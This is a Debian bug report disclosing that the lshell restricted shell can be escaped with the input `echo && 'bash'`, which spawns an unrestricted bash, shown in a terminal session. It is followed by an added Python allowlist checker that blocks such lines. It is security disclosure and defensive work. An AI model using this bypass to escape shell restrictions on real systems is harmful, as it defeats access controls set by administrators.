Package: lshell
Version: 0.9.16-1
Severity: grave
Tags: security upstream
Justification: user security hole

lshell fails to parse shell syntax correctly and restrictions can be overrun:

root@debian:~# getent passwd testuser
testuser:x:1001:1001:,,,:/home/testuser:/usr/bin/lshell
root@debian:~# su - testuser
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo
testuser:~$ bash
*** forbidden command: bash
testuser:~$ echo && 'bash'
testuser@debian:~$ ps -f
UID        PID  PPID  C STIME TTY          TIME CMD
testuser  4000  3999  0 23:12 pts/1    00:00:00 /usr/bin/python /usr/bin/lshell
testuser  4001  4000  0 23:12 pts/1    00:00:00 sh -c set -m; echo && 'bash'
testuser  4002  4001  0 23:12 pts/1    00:00:00 bash
testuser  4007  4002  0 23:13 pts/1    00:00:00 ps -f

The problem exists in the current upstream code. There is an open issue on
GitHub but no reaction yet: https://github.com/ghantoos/lshell/issues/147

The command parser in this shell is beyond recovery. I recommend replacing
this shell with a symlink to /usr/sbin/nologin.

-- System Information:
Debian Release: 8.5
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages lshell depends on:
ii  adduser  3.113+nmu3
ii  python   2.7.9-1

lshell recommends no packages.

lshell suggests no packages.

-- no debconf information
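
Added example, not part of the original report and not lshell's code or fix: a conservative allowlist check that tokenizes the line the way sh will (quotes removed, control operators split out) and tests the first word of every resulting command, so the report's `echo && 'bash'` is refused. The allowed list is copied from the `?` output above; the function names and refused-character set are assumptions of this sketch, which needs Python 3.8 or later.

```python
import shlex

# Allowed commands, copied from the '?' output in the report.
ALLOWED = {"cd", "clear", "echo", "exit", "help", "history",
           "ll", "lpath", "ls", "lsudo"}
# Characters refused outright: substitution, grouping, redirection, newline.
REFUSED = set("`$(){}<>\n")
# After the REFUSED scan, shlex punctuation tokens consist only of these.
OPERATOR_CHARS = set(";&|")


def split_commands(line):
    """Split a line into the simple commands sh would run, quotes removed."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True   # only whitespace and operators end a word
    lexer.commenters = ""           # 'a#b' is one word to sh: never drop text
    commands, current = [], []
    for token in lexer:
        # A quoted ';' also lands here; treating it as an operator only
        # makes the check stricter.
        if token and set(token) <= OPERATOR_CHARS:
            commands.append(current)
            current = []
        else:
            current.append(token)
    commands.append(current)
    return commands


def check_line(line):
    """Return (ok, reason); ok only if every command word is in ALLOWED."""
    if not line.strip():
        return True, "empty line"
    bad = REFUSED.intersection(line)
    if bad:
        return False, "refused character(s): %s" % "".join(sorted(bad))
    try:
        commands = split_commands(line)
    except ValueError as exc:       # e.g. unterminated quote
        return False, "unparsable input: %s" % exc
    for argv in commands:
        if not argv:
            return False, "empty command next to an operator"
        if argv[0] not in ALLOWED:
            return False, "forbidden command: %s" % argv[0]
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample lines; the second is the one from the report.
    for sample in ["ls -l", "echo && 'bash'", "echo a#b; bash", "echo 'x"]:
        print(repr(sample), check_line(sample))
```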